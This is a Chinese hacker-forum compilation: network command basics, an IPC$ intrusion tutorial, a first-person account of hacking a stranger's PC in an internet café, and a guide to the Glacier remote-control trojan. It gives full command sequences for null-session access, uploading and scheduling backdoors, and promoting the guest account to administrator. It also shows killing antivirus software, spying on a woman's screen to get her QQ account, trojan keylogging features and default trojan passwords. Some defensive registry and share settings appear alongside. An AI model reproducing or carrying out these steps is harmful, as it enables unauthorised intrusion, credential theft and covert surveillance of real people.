netstat [-a] [-e] [-n] [-s][-p proto] [-r] [interval] 其中的參数说明如下:
-a 顯示所有主机的埠号;
-e 顯示乙太网统計资讯;
-n 以数位表格形式顯示位址和埠;
-p proto 顯示特定的协定的具体使用资讯;
-r 顯示本机路由表的内容;
-s 顯示每个协定的使用狀態(包括TCP、UDP、IP);
interval 重新顯示所选的狀態,每次顯示之间的间隔数(單位秒)。
netstat命令的主要用途是檢測本地系统开放的埠,这样做可以了解自己的系统开放了什么服務、还可以初步推断系统是否存在木马,因为常見的网路服務开放的默认埠輕易不会被木马佔用,例如:用于FTP(檔传輸协议)的埠是21;用于TELNET(远端登录协定)的埠是23;用于SMTP(郵件传輸协定)的埠是25;用于DNS(功能变数名稱服務,即功能变数名稱與IP之间的轉换)的埠是53;用于HTTP(超文本传輸协定)的埠是80;用于POP3(电子郵件的一种接收协定)的埠是110;WINDOWS中开放的埠是139,除此以外,如果系统中还有其他陌生的到口,就可能是木马程式使用的了。通过netstat或者netstat -a可以觀察开放的埠,如果发现下面的埠,就说明已经有木马程式在系统中存在:
31337号埠是BackOffice木马的默认埠;1999是Yai木马程式;2140或者3150都是DEEP THROAT木马使用的埠;还有NETBUS、冰河或者SUB7等木马程式都可以自定義埠,因此发现了陌生埠一定要提高警惕,使用防火墙或者查病毒软体进行檢測。
五、tracert命令:
这个命令的功能是判定资料包到达目的主机所经过的路徑、顯示资料包经过的中繼节点清單和到达时间。tracert命令的格式如下:
tracert [-d] [-hmaximum_hops] [-j host-list] [-w timeout] target_name
命令行中的參数-d是要求tracert不对主机名进行解析,-h是指定搜索到目的地址的最大輪数,-j的功能是沿者主机列表释放源路由,-w用来設置超时时间间隔。
通过tracert可以判断一个伺服器是屬于国内还是国际(网路服務器的物理未知不能依*功能变数名稱进行判断),根據路由路经可以判断资讯从自己的系统发送到网路上,先后经过了哪些IP到大对方伺服器,这就好像乘公共汽車的时候从起点出发到达终点站的时候,中途会出现很多路牌一个道理,我们清楚了自己的资讯的传送路徑,才能够更清晰的了解网路、对伺服器进行攻击。
六、winipcfg:
winipcfg和ipconfig都是用来顯示主机内IP协定的配置资讯。只是winipcfg适用于Windows 95/98,而ipconfig适用于Windows NT。winipcfg不使用參数,直接运行它,它就会采用Windows視窗的形式顯示具体资讯。这些资讯包括:网路适配器的物理位址、主机的IP位址、子网路遮罩以及默认閘道等,点击其中的“其他资讯”,还可以查看主机的相关资讯如:主机名、DNS伺服器、节点类型等。其中网路适配器的物理位址在檢測网路错误时非常有用。
ipconfig的命令格式如下:ipconfig [/? |/all | /release [adapter] | /renew [adapter]]
其中的參数说明如下:
使用不帶參数的ipconfig命令可以得到以下资讯:IP地址、子网路遮罩、默认閘道。而使用ipconfig
/? 顯示ipconfig的格式和參数的英文说明;
/all 顯示所有的配置资讯;
/release 为指定的适配器(或全部适配器)释放IP位址(只适用于DHCP);
/renew 为指定的适配器(或全部适配器)更新IP位址(只适用于DHCP)。
/all,则可以得到更多的资讯:主机名、DNS伺服器、节点类型、网路适配器的物理位址、主机的IP位址、子网路遮罩以及默认閘道等。
==================================================
ipc$入侵與防範
一 前言
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏優秀之作,攻击步驟甚至可以说已经成为经典的模式,因此也没人願意再把这已经成为定式的東西拿出来擺弄。
不过話雖这样说,但我个人认为这些文章講解的并不詳細,对于第一次接触ipc$的菜鸟来说,簡單的羅列步驟并不能解答他们的许多迷惑。
二 什么是ipc$
IPC$(Internet ProcessConnection)是共用"具名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的具名管道,可以通过验证用户名和密码获得相应的许可权,在远端管理电脑和查看电脑的共用资源时使用。
利用IPC$,連接者甚至可以與目标主机建立一个空的連接而无需用户名與密码(当然,对方机器必须开了ipc$共用,否则你是連接不上的),而利用这个空的連接,連接者还可以得到目标主机上的用户列表(不过負責的管理员会禁止導出用户列表的)。
我们總在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意義上的漏洞,它是为了方便管理员的远端管理而开放的远端网路登陸功能,而且还打开了默认共用,即所有的邏輯盤(c$,d$,e$......)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代詞一个)会利用IPC$,访問共用资源,導出用户列表,并使用一些字典工具,进行密码探測,寄希望于获得更高的许可权,从而达到不可告人的目的。
解惑:
1)IPC連接是Windows NT及以上系统中特有的远端网路登陸功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友说在98下能建立空的連接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果对方关閉了ipc$共用,你仍然无法建立連接
3)并不是说建立了ipc$連接就可以查看对方的用户列表,因为管理员可以禁止導出用户列表
三 建立ipc$連接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的連接,你也可以获得不少的资讯(而这些资讯往往是入侵中必不可少的),访問部分共用,如果你能够以某一个具有一定许可权的用户身份登陸的話,那么你就会得到相应的许可权,顯然,如果你以管理员身份登陸,嘿嘿,就不用我在多说了吧,what u want,ucan do!!
(基本上可以總结为获取目标资讯、管理目标进程和服務,上传木马并运行,如果是2000server,还可以考慮开啟终端服務方便控制.怎么样?够厲害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,雖然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,隨者人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的
因此今后你最大的可能就是以极小的许可权甚至是没有许可权进行連接,你会慢慢的发现ipc$連接并不是萬能的,甚至在主机不开啟ipc$共用时,你根本就无法連接。
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它戰无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但卻是不可缺少的,我覺得这才是ipc$連接在hack入侵中的意義所在。
四 ipc$與空連接,139,445埠,默认共用的关係
以上四者的关係可能是菜鸟很困惑的一个問題,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透徹,都是在與大家交流中總结出来的.(一个有良好討论氛圍的BBS可以说是菜鸟的天堂)
1)ipc$與空連接:
不需要用户名與密码的ipc$連接即为空連接,一旦你以某个用户或管理员的身份登陸(即以特定的用户名和密码进行ipc$連接),自然就不能叫做空連接了。
许多人可能要問了,既然可以空連接,那我以后就空連接好了,为什么还要費九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空連接登陸时,你没有任何许可权(很鬱悶吧),而你以用户或管理员的身份登陸时,你就会有相应的许可权(有许可权誰不想呀,所以还是老老实实扫吧,不要偷懶喲)。
2)ipc$與139,445埠:
ipc$連接可以实现远端登陸及对默认共用的访問;而139埠的开啟表示netbios协议的应用,我们可以通过139,445(win2000)埠实现对共用檔/印表机的访問,因此一般来講,ipc$連接是需要139或445埠来支援的。
3)ipc$與默认共用
默认共用是为了方便管理员远端管理而默认开啟的共用(你当然可以关閉它),即所有的邏輯盤(c$,d$,e$......)和系统目录winnt或windows(admin$),我们通过ipc$連接可以实现对这些默认共用的访問(前提是对方没有关閉这些默认共用)
五 ipc$連接失败的原因
以下5个原因是比较常見的:
1)你的系统不是NT或以上作業系统;
2)对方没有打开ipc$默认共用
3)对方未开啟139或445埠(惑被防火墙遮罩)
4)你的命令輸入有误(比如缺少了空格等)
5)用户名或密码错误(空連接当然无所谓了)
另外,你也可以根據返回的错误号分析原因:
错误号5,拒絕访問 : 很可能你使用的用户不是管理员许可权的,先提升许可权;
错误号51,Windows 无法找到网路路徑 : 网路有問題;
错误号53,找不到网路路徑 : ip位址错误;目标未开机;目标lanmanserver服務未啟动;
目标有防火墙(埠过濾);
错误号67,找不到网路名 : 你的lanmanworkstation服務未啟动;目标刪除了ipc$;
错误号1219,提供的憑據與已存在的憑據集衝突 : 你已经和对方建立了一个ipc$,请刪除再連。
错误号1326,未知的用户名或错误密码 : 原因很明顯了;
错误号1792,试圖登录,但是网路登录服務没有啟动 : 目标NetLogon服務未啟动。(連接域控会出现此情況)
错误号2242,此用户的密码已经过期 : 目标有帳号策略,強制定期要求更改密码。
关于ipc$連不上的問題比较复杂,除了以上的原因,还会有其他一些不確定因素,在此本人无法詳細而確定的说明,就*大家自己体会和试验了。
六如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依賴于ipc$的shell,比如sql的cmd擴展、telnet、木马,当然,这shell必须是admin许可权的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请確认相关服務都已运行,没有就啟动它(不知道怎么做的请看net命令的用法),还是不行的話(比如有防火墙,殺不了)建议放棄。
七如何防範ipc$入侵
1禁止空連接进行枚举(此操作并不能阻止空連接的建立,引自《解剖win2000下的空会話》)
首先运行regedit,找到如下組建
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous= DWORD的鍵值改为:00000001(如果設置为2的話,有一些問題会发生,比如一些WIN的服務出现問題等等)
2禁止默认共用
1)察看本地共用资源
运行-cmd-輸入net share
2)刪除共用(每次輸入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,......可以繼續刪除)
3)停止server服務
net stop server /y (重新啟动后server服務会重新开啟)
4)修改註冊表
运行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改为:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改为:00000000。
如果上面所说的主鍵不存在,就新建(右击-新建-雙位元組值)一个主健再改鍵值。
3永久关閉ipc$和默认共用依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右击)-屬性-常規-啟动类型-已禁用
4安装防火墙(选中相关設置),或者埠过濾(濾掉139,445等),或者用新版本的優化大師
5設置复杂密码,防止通过ipc$窮举密码
八 相关命令
1)建立空連接:
net use \\IP\ipc$"" /user:""(一定要注意:这一行命令中包含了3个空格)
2)建立非空連接:
net use \\IP\ipc$ "用户名"/user:"密码" (同样有3个空格)
3)映射默认共用:
net use z: \\IP\c$ "密码"/user:"用户名" (即可将对方的c盤映射为自己的z盤,其他盤类推)
如果已经和目标建立了ipc$,则可以直接用IP+盤符+$访問,具体命令 net use z: \\IP\c$
4)刪除一个ipc$連接
net use \\IP\ipc$ /del
5)刪除共用映射
net use c: /del 刪除映射的c盤,其他盤类推
net use * /del 刪除全部,会有提示要求按y確认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:\>net use\\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运氣好到家了),如果是打算攻击的話,就可以用这样的命令来與127.0.0.1建立一个連接,因为密码为"空",所以第一个引号处就不用輸入,后面一个雙引号里的是用户名,輸入administrators,命令即可成功完成。
2. C:\>copy srv.exe\\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盤與D盤,这看你要复制到什么地方去了)。
3. C:\>net time\\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.111:05 srv.exe
用at命令啟动srv.exe吧(这里設置的时间要比主机时间快,不然你怎么啟动啊,呵呵!)
5. C:\>net time\\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19上午 11:05,那就準備开始下面的命令。
6. C:\>telnet 127.0.0.199
这里会用到Telnet命令吧,注意埠是99。Telnet默认的是23埠,但是我们使用的是SRV在对方电脑中为我们建立一个99埠的Shell。
雖然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再啟动!所以我们打算建立一个Telnet服務!这就要用到ntlm了
7.C:\>copy ntlm.exe\\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8.C:\WINNT\system32>ntlm
輸入ntlm啟动(这里的C:\WINNT\system32>指的是对方电脑,运行ntlm其实是让这个程式在对方电脑上运行)。当出现"DONE"的时候,就说明已经啟动正常。然后使用"net starttelnet"来开啟Telnet服務!
9. Telnet 127.0.0.1,接者輸入用户名與密码就进入对方了,操作就像在DOS上操作一样簡單!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防萬一,我们再把guest啟动加到管理組
10. C:\>net user guest/active:yes
将对方的Guest用户啟动
11. C:\>net user guest1234
将Guest的密码改为1234,或者你要設定的密码
12. C:\>net localgroupadministrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帳号没改变的話,下次我们可以用guest再次访問这台电脑)
十 總结:
关于ipc入侵就说这么多了,覺得已经够詳細了,如果有不準確的地方,希望能與大家討论。
================================================================
网吧入侵全攻略
好久都没来网吧了.今天一朋友来找我.外面有下者雪.实在没地方玩.又给溜进了网吧...
在以前家里没買电脑时.整天都泡这网吧..所以对他的系统設置什么还了解点.都大半年没来了...不知道有啥变化..
这网吧还不错.别的网吧都是无盤的或者就是98的.这里98和2000都有..呵...搞入侵可方便了....
无意的看到13号坐者两MM...嘻....入侵也由此开始了.看能不能拿到MM的QQ号.....偶也找了一2000系统的机器做下..(偶找了一角落.呵.这样比较安全点..)
打开偶可爱的CMD..先net name下看看本机情況
WANGLU05
USER2000
命令成功完成。
我本机名是WANGLU05.ping下看看IP有无什么規则
Pinging wanglu05[192.168.0.13] with 32 bytes of data:
Reply from 192.168.0.13:bytes=32 timenet use //192.168.0.225/ipc$ "" /user:"user04"
命令成功完成。
网吧系统盤为G盤.接者映射对方G盤为我本地Z盤.
G:/>net use z://192.168.0.225/g$
命令成功完成。
现在我的电脑里多了一个Z盤...圖3.
现在我们在这个Z盤里新建或刪除檔.也就等于在192.168.0.225这个机器上操作了...
这些相信大家都知道的吧..我就不廢話了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....
下面来copy一个木马用户端上去先...由于只是看QQ而已...所以我找了一个
web控制台.体积没多大,205KB..下面是关于webserver的介绍./../
web控制台 (本站不提供此类工具下載)
一个直接在IE欄里輸入对方IP就可以控制对方机器的小软体,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服務端后,你在IE欄里直接輸入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。
接者
G:/>copy webserver.exe//192.168.0.225/admin$
已复制 1 个檔。
G:/>net time//192.168.0.225
//192.168.0.225 的当前时间是 2005/2/5 下午 05:00
命令成功完成
G:/>at //192.168.0.22517:02 webserver.exe
用AT命令啟动webserver.exe.
2分鐘过后.在IE里輸入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分鐘了.还是打不开....后来又重新来了一次.眼睛就盯者MM的螢幕看,才发现到了我指定的时间.程式执行时.被瑞星给殺了...
FT....我说那.
难道就没辦法了嗎...当然不是...可以换个别的马或加殼.修改它特徵码什么的.但在网吧工具也不是很齊全.我也懶的下..
还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软体了...
打开控制面板--管理工具--电脑管理
操作-連接到另一电脑.
然后輸入IP192.168.0.225
呵.等一会就可以看到成功了...你看到了什么?
更爽的是我们可以远端开啟他的服務...在这里啟动他的telnet服務.
OK了...
本地打开一cmd
輸入
G:/>telnet 192.168.0.225
回車后出现
Server allows NTLMauthentication only
Server has closedconnection
需要NTML认证的...用小榕的那个ntml.exe就可以解决这一問題.
ntlm.exe在《流光》的Tools目录中有的...
没工具怎么辦呢..
我们在本地添加一和远端主机同样的用户名
輸入
net user user04 /add 添加user04密码为空的用户
net localgroupadministrators user04 /add 把user04加入管理员組
然后来到G:/Winnt/system32下找到CMD.exe
右击.創建快捷方式.然后在快捷方式 CMD右击..屬性.
在以其他用户身份运行前打勾...
然后运行
快捷方式 CMD
彈出窗口.在用户名处輸入user04密码为空
然后
telnet 192.168.0.225
回車..哈哈...拿到shell了....
接下来的事就好辦了...去黑基down了一个knlps 命令行下殺进程的東東
copy上去././然后telnet上去.在CMD下执行...殺掉了瑞星的进程
这下把瑞星给关了.还怕他提示有毒
接者执行webserver.exe
在IE里輸入
192.168.0.225
看到了.挖卡卡..开心...点那个查看螢幕..呵..MM正在聊天...
好了她的QQ号码也拿到手了..加了她去聊聊去....
[ 此帖被cy20在2005-11-06 00:24重新编輯 ]
[樓 主] | 发表于:2005-11-0405:33 PM
免費自由共用 让菜鸟在校園骇客联盟起飛WwW.SchoolHacker.CoM
cy20
级别: 優秀学生
精華: 1
发帖: 125
威望: 330 点
大洋: 6525 ¥
貢獻值: 0 点
线上时间:33(小时)
註冊时间:2005-10-27
最后登陸:2006-02-27
--------------------------------------------------------------------------------
木马工具詳解+入门工具使用
现在我们来看看木马在骇客学习中的作用。首先学习者要明確木马究竟是什么,同时还要搞清楚木马的类型,并且学习一些流行的木马程式的用法,这是一个相輔相成的学习进程,当骇客利用漏洞进入伺服器之后,就可以选择两条路:一、破坏系统、获得资料、顯示自己;二、利用木马为自己开闢一个合法的登录帳号、掌管系统、利用被入侵系统作为跳板繼續攻击其他系统。
由此看来,木马程式是为第二种情況涉及的一种可以远端控制系统的程式,根據实现木马程式的目的,可以知道这种程式应该具有以下性質:
1、伪装性:程式将自己的服務端伪装成合法程式,并且具有誘惑力的让被攻击者执行,在程式被啟动后,木马代码会在未经授权的情況下运行并装載到系统开始运行进程中;
2、隱藏性:木马程式通病毒程式一样,不会暴露在系统进程管理器内,也不会让使用者察覺到木马的存在,它的所有动作都是伴隨其他程式的运行进行的,因此在一般情況下使用者很难发现系统中木马的存在;
3、破坏性:通过远端控制,骇客可以通过木马程式对系统中的檔进行刪除、编輯操作,还可以进行諸如格式化硬碟、改变系统啟动參数等惡性破坏操作;
4、竊密性:木马程式最大的特点就是可以窺視被入侵电脑上的所有资料,这不僅包括硬碟上的檔,还包括顯示器畫面、使用者在操作电脑过程中在硬碟上輸入的所有命令等。
看了上面的介绍,学习者应该对木马程式的用途有了一个初步了解,并且区分清除木马程式和病毒之间的相同点和不同点,由于骇客手段的日益增多,许多新出现的骇客手段(例如 D.O.S)经常会让学习者思维混乱,但实际上这些新出现的骇客手段都是从最开始的溢出、木马演变出来的,因而对于初学者来说,并不需要急于接触过多的新技术,而是要对最基本的也是最有效的骇客技术进行深入学习。
一、木马的原理:
大多数木马程式的基本原理都是一样的,他们是由两个程式配合使用——被安装在入侵系统内的Server程式;另一个是对Server其控制作用的Client程式。学习者已经了解了木马和病毒的区别,大多数Server程式不会像病毒一样主动传播,而是潛伏在一些合法程式内部,然后由目标操作者親手将其安装到系统中,雖然这一切都是没有经过目标操作者授权的,然而从某种程度上说,这的確是在经过誘惑后目标“心甘情願”接收木马的,当Server安装成功后,骇客就可以通过Client控制程式对Server端进行各种操作了。
木马程式的Server端为了隱藏自己,必须在設計中做到不让自己顯示到任務欄或者系统进程控制器中,同时还不会影響其他程式的正常运行,当使用者电脑处于断线狀態下,Server段不会发送任何资讯到預設的埠上,而会自动檢測网路狀態直到网路連接好,Server会通过email或者其他形式将Server端系统资料通知Client端,同时接收Client发送出来的请求。
二.木马实戰:
先说国產木马老大,冰河-----你不得不了解的工具。
(编者殘语:)说到冰河,也许在2005年的今天顯得很落后,但冰河創造了一个时代,一个人人能做骇客的时代。使用方便簡單,人人都能上手。圖形介面,中文功能表,了解木马,先从了解远端控制软体冰河开始。
======================================================
使用冰河前,请注意:如果你的机器有殺毒软体,可能会出现病毒提示。说实話,他还真是一个病毒。呵呵。所以在使用前,请慎重考慮,出了問題,小编可擔当不起。建议使用不管是用户端还是服務端都请关閉殺毒软体以达到更好的使用效果。
======================================================
软体功能概述:
该软体主要用于远端監控,具体功能包括:
1.自动跟踪目的机螢幕变化,同时可以完全类比鍵盤及滑鼠輸入,即在同步被控端螢幕变化的同时,監控端的一切鍵盤及滑鼠操作将反映在被控端螢幕(局域网适用);
2.记录各种口令资讯:包括开机口令、屏保口令、各种共用资源口令及絕大多数在对話方塊中出现过的口令资讯,且1.2以上的版本中允许用户对该功能自行擴充,2.0以上版本还同时提供了击鍵记录功能;
3.获取系统资讯:包括电脑名、註冊公司、当前用户、系统路徑、作業系统版本、当前顯示解析度、物理及邏輯磁片资讯等多项系统资料;
4.限制系统功能:包括远端关机、远端重啟电脑、鎖定滑鼠、鎖定系统熱鍵及鎖定註冊表等多项功能限制;
5.远程檔操作:包括創建、上传、下載、复制、刪除檔或目录、檔壓縮、快速流览文字檔案、远端打开檔(提供了四中不同的打开方式——正常方式、最大化、最小化和隱藏方式)等多项檔操作功能;
6.註冊表操作:包括对主鍵的流览、增刪、复制、重命名和对鍵值的读写等所有註冊表操作功能;
7.发送资讯:以四种常用圖示向被控端发送簡短资讯;
8.点对点通讯:以聊天室形式同被控端进行线上交談。
一.文件列表:
1. G_Server.exe: 被監控端后台監控程序(运行一次即自动安装,可任意改名),在安装前可以先通过'G_Client'的'配置本端伺服器程式'功能进行一些特殊配置,例如是否将动態IP发送到指定信箱、改变監听埠、設置访問口令等);
2. G_Client.exe: 監控端执行程式,用于監控远端电脑和配置伺服器程式。
二.準備工作:
冰河是一个基于TCP/IP协定和WINDOWS作業系统的网路工具,所以首先应確保该协定已被安装且网路連接无误,然后配置伺服器程式(如果不进行配置则取默认設置),并在欲監控的电脑上运行伺服器端監控程序即可。
三.升级方法:
由于冰河2.0的改版较大,所以2.0以后版本與以前各版本完全不相容。为此只能向老用户提供一套升级方案:对于1.1版本的用户(好象已经没什么人用了),可以先用1.1或1.2版的CLIENT端将新版本的SERVER程式上传至被監控端,然后执行'檔打开'命令即可;对于1.2版本的用户相对簡單,只要通过1.2版的CLIENT远端打开新版本的SERVER程式就可以自动升级了。2.0以后的各版本完全相容。
'DARKSUN專版'中还提供了另一种升级方法,可以免去在不同版本中切换的麻煩。如果您不能確定远端主机的冰河版本,在用'檔管理器'流览目录前,最好先在工具欄下的'当前連接'列表框中选择打算連接的主机,然后直接点'升级1.2版本'按鈕进行升级,如果返回的资讯是'无法解释的命令',那说明远端主机安装了2.0以上版本,具体的版本及系统资讯可以通过'命令控制台'的'口令类命令\系统资讯及口令\系统资讯'来查看。
四.各模組簡要说明:
安装好伺服器端監控程序后,运行用户端程式就可以对远端电脑进行監控了,用户端执行程式的各模組功能如下:
1. "添加主机": 将被監控端IP位址添加至主机列表,同时設置好访問口令及埠,設置将保存在'Operate.ini'檔中,以后不必重輸。如果需要修改設置,可以重新添加该主机,或在主介面工具欄内重新輸入访問口令及埠并保存設置;
2. "刪除主机": 将被監控端IP位址从主机列表中刪除(相关設置也将同时被清除);
3. "自动搜索": 搜索指定子网内安装有'冰河'的电脑。(例如欲搜索IP地址'192.168.1.1'至'192.168.1.255'网段的电脑,应将'起始域'設为'192.168.1',将'起始位址'和'终止位址'分别設为'1'和'255');
4. "查看螢幕": 查看被監控端螢幕(相当于命令控制台中的'控制类命令\捕获螢幕\查看螢幕');
5. "螢幕控制": 远端类比滑鼠及鍵盤輸入(相当于命令控制台中的'控制类命令\捕获螢幕\螢幕控制')。其余同"查看螢幕";
6. "冰河信使": 点对点聊天室,也就是传说中的'二人世界';
7. "升级1.2版本": 通过'DARKSUN專版'的冰河来升级远端1.2版本的伺服器程式;
8. "修改远端配置": 线上修改访問口令、監听埠等伺服器程式設置,不需要重新上传整个檔,修改后立即生效;
9. "配置本端伺服器程式": 在安装前对'G_Server.exe'进行配置(例如是否将动態IP发送到指定信箱、改变監听埠、設置访問口令等)。
五.文件管理器操作说明:
檔管理器对檔操作提供了下列滑鼠操作功能:
1. 文件上传:右鍵單击欲上传的檔,选择'复制',在目的目录中粘帖即可。也可以在目的目录中选择'檔上传自',并选定欲上传的文件;
2. 文件下載:右鍵單击欲下載的檔,选择'复制',在目的目录中粘帖即可。也可以在选定欲下載的檔后选择'檔下載至',并选定目的目录及檔案名;
3. 打开远端或本地檔:选定欲打开的檔,在彈出功能表中选择'远端打开'或'本地打开',对于可执行檔若选择了'远端打开',可以进一步設置檔的运行方式和运行參数(运行參数可为空);
4. 刪除檔或目录:选定欲刪除的檔或目录,在彈出功能表中选择'刪除';
5. 新建目录:在彈出功能表中选择'新建檔夾'并輸入目录名即可;
6. 文件查找:选定查找路徑,在彈出功能表中选择'檔查找',并輸入檔案名即可(支持通配符);
7. 拷貝整个目录(只限于被監控端本机):选定原始目录并复制,选定目的目录并粘帖即可。
六.命令控制台主要命令:
1. 口令类命令: 系统资讯及口令、歷史口令、击鍵记录;
2. 控制类命令: 捕获螢幕、发送资讯、进程管理、視窗管理、滑鼠控制、系统控制、其他控制(如'鎖定註冊表'等);
3. 网路类命令: 創建共用、刪除共用、查看网路资讯;
4. 文件类命令: 目录增刪、文本流览、檔查找、壓縮、复制、移动、上传、下載、刪除、打开(对于可执行檔则相当于創建进程);
5. 註冊表读写: 註冊表鍵值读写、重命名、主鍵流览、读写、重命名;
6. 設置类命令: 更换墙紙、更改电脑名、读取伺服器端配置、线上修改伺服器配置。
七.使用技巧:
1. 用'查看螢幕'命令抓取对方螢幕资讯后,若希望程式自动跟踪对方的螢幕变化,在右鍵彈出功能表中选中'自动跟踪'项即可;
2. 在檔操作过程中,滑鼠雙击本地檔将在本地开该檔;滑鼠雙击远端檔将先下載该檔至臨时目录,然后在本地打开;
3. 在使用'网路共用創建'命令时,如果不希望其他人看到新創建的共用名稱,可以在共用名稱后加上'$'符号。自己欲流览时只要在IE的位址欄或'开始菜單'的'运行'对話方塊内鍵入'\\[机器名]\[共用名稱(含'$'符号)]即可;
4. 在1.2以后的版本中允许用户設定捕获圖像的色深(1~7级),圖像将按設定保存为2的N次方种顏色(N=2的[1~7]次方),即1级为單色,2级为16色,3级为256色,依此类推。
需要说明的是如果将色深設为0或8则表示色深依被監控端当前的解析度而定,适当減小色深可以提高圖像的传輸速度。
2.1以后的版本新增了以JPEG格式传輸圖像的功能,以利于在INTERNET上传輸圖像,但这项功能只适用于2.1以上版本(制被控端),否则实际上仍是通过BMP圖像格式传輸,所以请先確认版本后再使用。
八.常見問題:
1. 安装不成功,该問題通常是由于TCP/IP协议安装或設置不正確所致;
2. 被監控端啟动时或與監控端連接时彈出'建立連接'对話方塊,该問題是由于系统設置了自动撥号屬性。可以通过安装前定制伺服器程式来禁止自动撥号;
3. 可以連接但没有反应,通常是版本不匹配所致,因为1.2以前的版本設計上存在缺陷,所以如果您不能確定远端主机的冰河版本,最好先按照前面所说的升级辦法试一下,否则被監控端可能会出现错误提示。另外冰河没有提供代理功能,局域网外无法監控局域网内的机器,除非被控端是閘道;
4. '更换墙紙'命令无效,这个問題的可能性太多了,较常見的原因是被監控端的桌面設置为'按WEB页查看';
5. 对被監控端进行檔或目录的增刪操作后,少数情況不会自动刷新,可以通过[Ctrl+R]或选择彈出功能表的'刷新'命令手动刷新;
6. 开机口令不正確,因为CMOS口令是單向编码,所以编码后的口令是不可逆也是不唯一的,冰河通过窮举算出来的口令可能與原口令不符,但也是有效口令。毛主席说过没有調查就没有发言权,所以没有试过就千萬别妄下定论;
7. 佔用系统资源过高,其实準確的说应该是CPU利用率过高,系统资源佔用并不算过分,这主要是不断探測口令资讯(敏感字元)造成的,所以在'DARKSUN專版'中允许用户将该功能遮罩(我实在不知道怎样才能兼顧魚和熊掌),只要在配置时清空'敏感字元'中的所有字串就行了。
8. 如何卸載冰河,这是我解答次数最多的一个問題,其实冰河1.2正式版以后的各版本都在CLIENT端提供了徹底的卸載功能。对于1.2版本,请执行命令列表中的'自动卸載'命令,对其以后的版本,请执行'命令控制台'中的'控制类命令\系统控制\自动卸載冰河'。
小编有言:说说卸冰河木马方法和冰河的通用密码
很多朋友問我中了木马“冰河”有什么方法可以卸掉,其实很簡單,有两个方法:
(1)用殺毒软体“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后
打不开本文檔了,那你可以用手动方法去卸。如果你覺得那个辦法太麻煩,可以用我介绍的第二种方法。
(2)用“冰河”卸“冰河”: 如果你確定你的机器种了冰河,那你上网后开啟冰河。 在增添主机那里添自己的IP。 然后电击自己的IP, 选命令控制台那里选控制命令里的系统命令。 然后自己看啦。不要再说你不会啊。我会暈的啊。:)
冰河通用密码
3.0版:yzkzero.51.net
3.0版:yzkzero!
3.1-netbug版密码: 123456!@
2.2殺手專版:05181977
2.2殺手專版:dzq2000!
文:殘
了解如何种植木马才能防止别人种植木马。看看一般人用的手段。(本文比较适合入门级别选手)
1.网吧种植
这个似乎在以前很流行,先关閉网吧的放火墙,再安装木马用户端,立刻结帳下机,注意,重点是不要重起机器,因为现在网吧都有还原精靈,所以在不关机器的情況下,木马是不会给发现的。因此,在网吧上网,首先要重起机器,其次看看殺毒软体有没有打开。最后建议,不要在网吧打开有重要密码的東西,如网路銀行等。毕竟现在木马用户端躲避防火墙的能力很強,其次是还存在其他的病毒。
2.通讯软体传送
发一条消息给你,说,“这个我的照片哦,快看看。”当你接受并打开的时候,你已经中了木马了。(此时,你打开的檔好象“没有任何反应”)“她”可能接者说说:“呀,发错了。再見。”防禦:不要輕易接受别人传的東西,其次是打开前要用殺毒软体查毒。
3.恐怖的捆綁
